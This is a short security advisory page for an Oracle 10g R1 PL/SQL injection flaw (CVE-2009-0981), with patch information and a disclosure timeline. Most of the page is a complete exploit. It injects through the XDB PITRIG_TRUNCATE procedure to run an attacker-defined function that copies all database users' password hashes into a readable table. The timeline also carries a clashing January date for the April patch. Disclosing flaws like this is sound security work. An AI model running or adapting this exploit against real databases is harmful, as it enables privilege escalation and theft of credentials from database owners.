Services
Information
Company |
Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)
Details This exploit causes the connection to the database to be lost (database crash). Example CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; COMMIT; RETURN ''; END; / EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); select * from sh2kerr; Patch Information Apply the latest Oracle Security patches (e.g. CPU April 2009 ) History 13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] 14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] 14-apr-2009 Advisory published © 2009 by Red-Database-Security GmbH - last update 19-jun-2009 |
Definition Exploit |